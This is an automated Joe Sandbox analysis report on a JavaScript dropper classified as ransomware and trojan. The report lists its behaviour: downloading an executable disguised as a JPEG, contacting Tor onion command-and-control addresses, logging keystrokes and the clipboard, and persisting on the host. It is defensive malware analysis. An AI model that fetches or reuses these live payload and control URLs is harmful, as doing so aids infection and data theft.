Loading ...

Analysis Report 21#U043e #U0437#U0430#U043a#U0430#U0437#U0435.js

Overview

General Information

Joe Sandbox Version:25.0.0
Analysis ID:773096
Start date:29.01.2019
Start time:15:03:56
Joe Sandbox Product:Cloud
Overall analysis duration:0h 18m 51s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:21#U043e #U0437#U0430#U043a#U0430#U0437#U0435.js
Cookbook file name:default-e00499e21f9dcf77fc990400b8b3c2b5.jbs
Analysis system description:Windows 10 64 bit (version 1803) with Office 2016 Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Number of analysed new started processes analysed:18
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies
  • HCA enabled
  • EGA enabled
  • GSI enabled (VBA)
  • GSI enabled (Javascript)
  • GSI enabled (Java)
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.rans.troj.evad.winJS@16/229@12/11
EGA Information:
  • Successful, ratio: 75%
HCA Information:
  • Successful, ratio: 51%
  • Number of executed functions: 125
  • Number of non-executed functions: 134
Cookbook Comments:
  • Adjust boot time
  • Found application associated with file extension: .js
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe, wermgr.exe, conhost.exe, CompatTelRunner.exe, VSSVC.exe, svchost.exe
  • Execution Graph export aborted for target wscript.exe, PID 3920 because there are no executed function
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtDeviceIoControlFile calls found.
  • Report size getting too big, too many NtOpenFile calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtReadFile calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.
  • Report size getting too big, too many NtWriteFile calls found.

Detection

StrategyScoreRangeReportingWhitelistedDetection
Threshold1000 - 100Report FP / FNfalsemalicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Analysis Advice

Sample has functionality to log and monitor keystrokes, analyze it with the 'Simulates keyboard and window changes' cookbook
Sample tries to load a library which is not present or installed on the analysis machine, adding the library might reveal more behavior
Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and Control
Valid AccountsScripting11Registry Run Keys / Start Folder1Process Injection111Masquerading1Input Capture21Process Discovery2Application Deployment SoftwareInput Capture21Data Encrypted2Data Obfuscation1
Replication Through Removable MediaService ExecutionPort MonitorsAccessibility FeaturesDisabling Security Tools1Network SniffingAccount Discovery1Remote ServicesClipboard Data1Exfiltration Over Other Network MediumUncommonly Used Port1
Drive-by CompromiseWindows Management InstrumentationAccessibility FeaturesPath InterceptionProcess Injection111Input CaptureSecurity Software Discovery31Windows Remote ManagementData from Network Shared DriveAutomated ExfiltrationStandard Cryptographic Protocol2
Exploit Public-Facing ApplicationScheduled TaskSystem FirmwareDLL Search Order HijackingScripting11Credentials in FilesRemote System Discovery1Logon ScriptsInput CaptureData EncryptedStandard Non-Application Layer Protocol3
Spearphishing LinkCommand-Line InterfaceShortcut ModificationFile System Permissions WeaknessFile Deletion1Account ManipulationSystem Network Configuration Discovery1Shared WebrootData StagedScheduled TransferStandard Application Layer Protocol23
Spearphishing AttachmentGraphical User InterfaceModify Existing ServiceNew ServiceObfuscated Files or Information3Brute ForceFile and Directory Discovery1Third-party SoftwareScreen CaptureData Transfer Size LimitsConnection Proxy2
Spearphishing via ServiceScriptingPath InterceptionScheduled TaskSoftware PackingTwo-Factor Authentication InterceptionSystem Information Discovery13Pass the HashEmail CollectionExfiltration Over Command and Control ChannelUncommonly Used Port

Signature Overview

Click to jump to signature section


Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic ProviderShow sources
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpCode function: 6_2_00525289 CryptAcquireContextA,GetLastError,CryptGenRandom,6_2_00525289
Public key (encryption) foundShow sources
Source: rad8AE2B.tmpBinary or memory string: -----BEGIN PUBLIC KEY-----

Spreading:

barindex
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpCode function: 6_2_005685CE __getdrive,FindFirstFileA,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,6_2_005685CE
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpCode function: 6_2_00416D6D _memset,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,6_2_00416D6D
Contains functionality to query local drivesShow sources
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpCode function: 6_2_00416AEC _memset,_memset,GetLogicalDriveStringsW,GetSystemDirectoryW,GetDriveTypeW,GetDriveTypeW,6_2_00416AEC

Networking:

barindex
Detected TCP or UDP traffic on non-standard portsShow sources
Source: global trafficTCP traffic: 192.168.1.103:50028 -> 71.19.157.127:993
Source: global trafficTCP traffic: 192.168.1.103:50029 -> 51.15.145.150:9001
Downloads files with wrong headers with respect to MIME Content-TypeShow sources
Source: httpImage file has PE prefix: HTTP/1.1 200 OK Date: Tue, 29 Jan 2019 14:05:19 GMT Server: Apache Last-Modified: Mon, 28 Jan 2019 15:58:59 GMT ETag: "f742856-17b6c8-58086c134f6c0" Accept-Ranges: bytes Content-Length: 1554120 Keep-Alive: timeout=10, max=50 Connection: Keep-Alive Content-Type: image/jpeg Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 8c 36 50 5c 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 02 32 00 62 16 00 00 48 01 00 00 00 00 00 20 61 16 00 00 10 00 00 00 80 16 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 20 00 00 02 00 00 38 59 18 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 0
Found Tor onion addressShow sources
Source: rad8AE2B.tmp, 00000006.00000002.9856441076.000000000387B000.00000004.sdmpString found in binary or memory: xzclh6fd.onion/prog.php
Source: rad8AE2B.tmp, 00000006.00000002.9856441076.000000000387B000.00000004.sdmpString found in binary or memory: /prog.phpxzclh6fd.onion/prog.php\amd64_microsoft-windows-mccs-syncres.resources_31bf3856ad364e35_10.0.17134.165_lt-lt_7b9145e0b29da4d9\SyncRes.dll.mui
Source: rad8AE2B.tmp, 00000006.00000002.9857834522.0000000003972000.00000004.sdmpString found in binary or memory: /prog.phpxzclh6fd.onion/prog.phpce Kevin\Local Settings\Microsoft\Windows\WebCache\OQY4NVYa-eGw1myEdDcZRqIAmmR0f4-aFjDcakUEHFo=.6C39D71348CD950D5B0C
Source: rad8AE2B.tmp, 00000006.00000002.9867612852.0000000003CE6000.00000004.sdmpString found in binary or memory: http://a4ad4ip2xzclh6fd.onion/
Source: rad8AE2B.tmp, 00000006.00000002.9876914002.0000000003F7C000.00000004.sdmpString found in binary or memory: http://cryptsen7fo43rr6.onion/
Source: rad8AE2B.tmp, 00000006.00000003.9329215013.0000000004C27000.00000004.sdmpString found in binary or memory: http://a4ad4ip2xzclh6fd.onion/prog.php
Source: rad8AE2B.tmp, 00000006.00000003.9329215013.0000000004C27000.00000004.sdmpString found in binary or memory: http://a4ad4ip2xzclh6fd.onion/prog.phpCqIV
Source: rad8AE2B.tmp, 00000006.00000003.9332897305.0000000004209000.00000004.sdmpString found in binary or memory: http://a4ad4ip2xzclh6fd.onion/prog.phpZN1s=n)1
Source: rad8AE2B.tmp, 00000006.00000003.9335474582.0000000004A85000.00000004.sdmpString found in binary or memory: http://a4ad4ip2xzclh6fd.onion/prog.phpq
Source: rad8AE2B.tmp, 00000006.00000003.9364568465.0000000004209000.00000004.sdmpString found in binary or memory: http://a4ad4ip2xzclh6fd.onion/prog.phpe
Source: rad8AE2B.tmp, 00000006.00000003.9458108325.0000000004209000.00000004.sdmpString found in binary or memory: http://a4ad4ip2xzclh6fd.onion/prog.php9R6M=B
May check the online IP address of the machineShow sources
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatsmyip.net
Source: unknownDNS query: name: whatsmyip.net
Source: unknownDNS query: name: whatsmyip.net
Connects to IPs without corresponding DNS lookupsShow sources
Source: unknownTCP traffic detected without corresponding DNS query: 193.23.244.244
Source: unknownTCP traffic detected without corresponding DNS query: 193.23.244.244
Source: unknownTCP traffic detected without corresponding DNS query: 193.23.244.244
Source: unknownTCP traffic detected without corresponding DNS query: 193.23.244.244
Source: unknownTCP traffic detected without corresponding DNS query: 193.23.244.244
Source: unknownTCP traffic detected without corresponding DNS query: 193.23.244.244
Source: unknownTCP traffic detected without corresponding DNS query: 193.23.244.244
Source: unknownTCP traffic detected without corresponding DNS query: 193.23.244.244
Source: unknownTCP traffic detected without corresponding DNS query: 193.23.244.244
Source: unknownTCP traffic detected without corresponding DNS query: 193.23.244.244
Source: unknownTCP traffic detected without corresponding DNS query: 193.23.244.244
Source: unknownTCP traffic detected without corresponding DNS query: 193.23.244.244
Source: unknownTCP traffic detected without corresponding DNS query: 193.23.244.244
Source: unknownTCP traffic detected without corresponding DNS query: 193.23.244.244
Source: unknownTCP traffic detected without corresponding DNS query: 193.23.244.244
Source: unknownTCP traffic detected without corresponding DNS query: 193.23.244.244
Source: unknownTCP traffic detected without corresponding DNS query: 193.23.244.244
Source: unknownTCP traffic detected without corresponding DNS query: 193.23.244.244
Source: unknownTCP traffic detected without corresponding DNS query: 193.23.244.244
Source: unknownTCP traffic detected without corresponding DNS query: 193.23.244.244
Source: unknownTCP traffic detected without corresponding DNS query: 193.23.244.244
Source: unknownTCP traffic detected without corresponding DNS query: 193.23.244.244
Source: unknownTCP traffic detected without corresponding DNS query: 193.23.244.244
Source: unknownTCP traffic detected without corresponding DNS query: 193.23.244.244
Source: unknownTCP traffic detected without corresponding DNS query: 193.23.244.244
Source: unknownTCP traffic detected without corresponding DNS query: 193.23.244.244
Source: unknownTCP traffic detected without corresponding DNS query: 193.23.244.244
Source: unknownTCP traffic detected without corresponding DNS query: 193.23.244.244
Source: unknownTCP traffic detected without corresponding DNS query: 193.23.244.244
Source: unknownTCP traffic detected without corresponding DNS query: 193.23.244.244
Source: unknownTCP traffic detected without corresponding DNS query: 193.23.244.244
Source: unknownTCP traffic detected without corresponding DNS query: 193.23.244.244
Source: unknownTCP traffic detected without corresponding DNS query: 193.23.244.244
Source: unknownTCP traffic detected without corresponding DNS query: 193.23.244.244
Source: unknownTCP traffic detected without corresponding DNS query: 193.23.244.244
Source: unknownTCP traffic detected without corresponding DNS query: 193.23.244.244
Source: unknownTCP traffic detected without corresponding DNS query: 193.23.244.244
Source: unknownTCP traffic detected without corresponding DNS query: 193.23.244.244
Source: unknownTCP traffic detected without corresponding DNS query: 193.23.244.244
Source: unknownTCP traffic detected without corresponding DNS query: 193.23.244.244
Source: unknownTCP traffic detected without corresponding DNS query: 193.23.244.244
Source: unknownTCP traffic detected without corresponding DNS query: 193.23.244.244
Source: unknownTCP traffic detected without corresponding DNS query: 193.23.244.244
Source: unknownTCP traffic detected without corresponding DNS query: 193.23.244.244
Source: unknownTCP traffic detected without corresponding DNS query: 193.23.244.244
Source: unknownTCP traffic detected without corresponding DNS query: 193.23.244.244
Source: unknownTCP traffic detected without corresponding DNS query: 193.23.244.244
Source: unknownTCP traffic detected without corresponding DNS query: 193.23.244.244
Source: unknownTCP traffic detected without corresponding DNS query: 193.23.244.244
Source: unknownTCP traffic detected without corresponding DNS query: 193.23.244.244
Downloads executable code via HTTPShow sources
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 29 Jan 2019 14:05:19 GMTServer: ApacheLast-Modified: Mon, 28 Jan 2019 15:58:59 GMTETag: "f742856-17b6c8-58086c134f6c0"Accept-Ranges: bytesContent-Length: 1554120Keep-Alive: timeout=10, max=50Connection: Keep-AliveContent-Type: image/jpegData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 8c 36 50 5c 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 02 32 00 62 16 00 00 48 01 00 00 00 00 00 20 61 16 00 00 10 00 00 00 80 16 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 20 00 00 02 00 00 38 59 18 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00
Uses a known web browser user agent for HTTP communicationShow sources
Source: global trafficHTTP traffic detected: GET /poshpebbles/images/messg.jpg HTTP/1.1Accept: */*Accept-Language: en-usAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poshpebbles.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comAccept: */*User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comAccept: */*User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comAccept: */*User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comAccept: */*User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comAccept: */*User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comAccept: */*User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comAccept: */*User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comAccept: */*User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comAccept: */*User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comAccept: */*User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatsmyip.netAccept: */*User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /poshpebbles/images/messg.jpg HTTP/1.1Accept: */*Accept-Language: en-usAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poshpebbles.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comAccept: */*User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comAccept: */*User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comAccept: */*User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comAccept: */*User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comAccept: */*User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comAccept: */*User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comAccept: */*User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comAccept: */*User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comAccept: */*User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comAccept: */*User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatsmyip.netAccept: */*User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Found strings which match to known social media urlsShow sources
Source: csrss.exe, 0000000A.00000002.9075025879.0000000003CCA000.00000004.sdmpString found in binary or memory: ww.mit.edu,www.yahoo.com,www.slashdot.org equals www.yahoo.com (Yahoo)
Source: rad8AE2B.tmp, csrss.exe, 00000007.00000002.8957279020.0000000000400000.00000040.sdmp, csrss.exe, 0000000A.00000002.9032107262.0000000000400000.00000040.sdmpString found in binary or memory: www.google.com,www.mit.edu,www.yahoo.com,www.slashdot.org equals www.yahoo.com (Yahoo)
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmp, csrss.exe, 00000007.00000002.8986663720.0000000002712000.00000004.sdmp, csrss.exe, 0000000A.00000002.9040685495.0000000002712000.00000004.sdmpString found in binary or memory: www.yahoo.com equals www.yahoo.com (Yahoo)
Source: rad8AE2B.tmp, 00000006.00000002.9855962211.00000000037B0000.00000004.sdmpString found in binary or memory: www.yahoo.comej equals www.yahoo.com (Yahoo)
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: poshpebbles.net
Urls found in memory or binary dataShow sources
Source: rad8AE2B.tmp, 00000006.00000002.9867612852.0000000003CE6000.00000004.sdmpString found in binary or memory: http://a4ad4ip2xzclh6fd.onion
Source: rad8AE2B.tmp, 00000006.00000002.9867612852.0000000003CE6000.00000004.sdmpString found in binary or memory: http://a4ad4ip2xzclh6fd.onion/
Source: rad8AE2B.tmp, 00000006.00000003.9329215013.0000000004C27000.00000004.sdmpString found in binary or memory: http://a4ad4ip2xzclh6fd.onion/prog.php
Source: rad8AE2B.tmp, 00000006.00000003.9458108325.0000000004209000.00000004.sdmpString found in binary or memory: http://a4ad4ip2xzclh6fd.onion/prog.php9R6M=B
Source: rad8AE2B.tmp, 00000006.00000003.9329215013.0000000004C27000.00000004.sdmpString found in binary or memory: http://a4ad4ip2xzclh6fd.onion/prog.phpCqIV
Source: rad8AE2B.tmp, 00000006.00000003.9332897305.0000000004209000.00000004.sdmpString found in binary or memory: http://a4ad4ip2xzclh6fd.onion/prog.phpZN1s=n)1
Source: rad8AE2B.tmp, 00000006.00000003.9364568465.0000000004209000.00000004.sdmpString found in binary or memory: http://a4ad4ip2xzclh6fd.onion/prog.phpe
Source: rad8AE2B.tmp, 00000006.00000003.9335474582.0000000004A85000.00000004.sdmpString found in binary or memory: http://a4ad4ip2xzclh6fd.onion/prog.phpq
Source: rad8AE2B.tmp, 00000006.00000002.9817520638.00000000005E5000.00000040.sdmp, csrss.exe, 00000007.00000002.8969607892.00000000005E5000.00000040.sdmp, csrss.exe, 0000000A.00000002.9035702562.00000000005E5000.00000040.sdmpString found in binary or memory: http://a4ad4ip2xzclh6fd.onionreg.phpprog.phperr.phpcmd.phpsys.phpshd.phpmail.php?&v=b=i=k=ss=e=c=f=s
Source: rad8AE2B.tmp, 00000006.00000003.9337968268.0000000004870000.00000004.sdmpString found in binary or memory: http://cryptsen7fo43rr6.onion.cab/
Source: rad8AE2B.tmp, 00000006.00000002.9876914002.0000000003F7C000.00000004.sdmpString found in binary or memory: http://cryptsen7fo43rr6.onion.cab/A
Source: rad8AE2B.tmp, 00000006.00000003.9337968268.0000000004870000.00000004.sdmpString found in binary or memory: http://cryptsen7fo43rr6.onion.cab/f
Source: rad8AE2B.tmp, 00000006.00000003.9337968268.0000000004870000.00000004.sdmpString found in binary or memory: http://cryptsen7fo43rr6.onion.cab/p
Source: rad8AE2B.tmp, 00000006.00000002.9876914002.0000000003F7C000.00000004.sdmpString found in binary or memory: http://cryptsen7fo43rr6.onion.to/
Source: rad8AE2B.tmp, 00000006.00000002.9876914002.0000000003F7C000.00000004.sdmpString found in binary or memory: http://cryptsen7fo43rr6.onion/
Source: wscript.exe, 00000001.00000002.8648989578.0000000002DAA000.00000004.sdmp, wscript.exe, 00000001.00000003.8642289372.0000000004F42000.00000004.sdmpString found in binary or memory: http://poshpebbles.net/poshpebbles/images/messg.jpg
Source: wscript.exe, 00000001.00000003.8642289372.0000000004F42000.00000004.sdmpString found in binary or memory: http://poshpebbles.net/poshpebbles/images/messg.jpgic
Source: rad8AE2B.tmp, csrss.exe, 00000007.00000002.8969607892.00000000005E5000.00000040.sdmp, csrss.exe, 0000000A.00000002.9035702562.00000000005E5000.00000040.sdmpString found in binary or memory: http://whatismyipaddress.com/
Source: rad8AE2B.tmp, 00000006.00000002.9817520638.00000000005E5000.00000040.sdmp, csrss.exe, 00000007.00000002.8969607892.00000000005E5000.00000040.sdmp, csrss.exe, 0000000A.00000002.9035702562.00000000005E5000.00000040.sdmpString found in binary or memory: http://whatismyipaddress.com///whatismyipaddress.com/ip/Click
Source: csrss.exe, 0000000A.00000002.9035702562.00000000005E5000.00000040.sdmpString found in binary or memory: http://whatsmyip.net/
Source: rad8AE2B.tmp, csrss.exe, 00000007.00000002.8957279020.0000000000400000.00000040.sdmp, csrss.exe, 0000000A.00000002.9032107262.0000000000400000.00000040.sdmpString found in binary or memory: http://www.openssl.org/support/faq.html
Source: rad8AE2B.tmp, 00000006.00000002.9800706398.0000000000400000.00000040.sdmp, csrss.exe, 00000007.00000002.8957279020.0000000000400000.00000040.sdmp, csrss.exe, 0000000A.00000002.9032107262.0000000000400000.00000040.sdmpString found in binary or memory: http://www.openssl.org/support/faq.html.
Source: wscript.exe, 00000001.00000002.8648989578.0000000002DAA000.00000004.sdmpString found in binary or memory: https://login.live.com
Source: rad8AE2B.tmp, rad8AE2B.tmp, 00000006.00000002.9800706398.0000000000400000.00000040.sdmp, csrss.exe, 00000007.00000002.8957279020.0000000000400000.00000040.sdmp, csrss.exe, 0000000A.00000002.9032107262.0000000000400000.00000040.sdmpString found in binary or memory: https://www.torproject.org/
Source: rad8AE2B.tmp, 00000006.00000003.9337968268.0000000004870000.00000004.sdmpString found in binary or memory: https://www.torproject.org/download/download-easy.html.en
Uses HTTPSShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50030 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Contains functionality for read data from the clipboardShow sources
Source: C:\ProgramData\Windows\csrss.exeCode function: 10_1_00566120 EntryPoint,OemKeyScan,GetEnhMetaFileW,GetActiveWindow,GetOpenClipboardWindow,AnyPopup,GetCaretBlinkTime,PathToRegion,CopyIcon,GetDC,IsCharAlphaNumericA,GetAsyncKeyState,GdiFlush,CloseEnhMetaFile,GetColorSpace,ShowCaret,GetThreadDesktop,VkKeyScanA,GetForegroundWindow,AddFontResourceA,CloseWindow,BeginPath,CloseFigure,GetTextCharset,CreateMetaFileA,GetQueueStatus,GetMenuContextHelpId,DestroyIcon,GetInputState,GetActiveWindow,CancelDC,GetClipboardSequenceNumber,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExW,10_1_00566120
Contains functionality to retrieve information about pressed keystrokesShow sources
Source: C:\ProgramData\Windows\csrss.exeCode function: 10_1_00566120 EntryPoint,OemKeyScan,GetEnhMetaFileW,GetActiveWindow,GetOpenClipboardWindow,AnyPopup,GetCaretBlinkTime,PathToRegion,CopyIcon,GetDC,IsCharAlphaNumericA,GetAsyncKeyState,GdiFlush,CloseEnhMetaFile,GetColorSpace,ShowCaret,GetThreadDesktop,VkKeyScanA,GetForegroundWindow,AddFontResourceA,CloseWindow,BeginPath,CloseFigure,GetTextCharset,CreateMetaFileA,GetQueueStatus,GetMenuContextHelpId,DestroyIcon,GetInputState,GetActiveWindow,CancelDC,GetClipboardSequenceNumber,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExW,10_1_00566120
Creates a DirectInput object (often for capturing keystrokes)Show sources
Source: rad8AE2B.tmp, 00000006.00000002.9829836774.0000000000920000.00000004.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Spam, unwanted Advertisements and Ransom Demands:

barindex
Contains functionalty to change the wallpaperShow sources
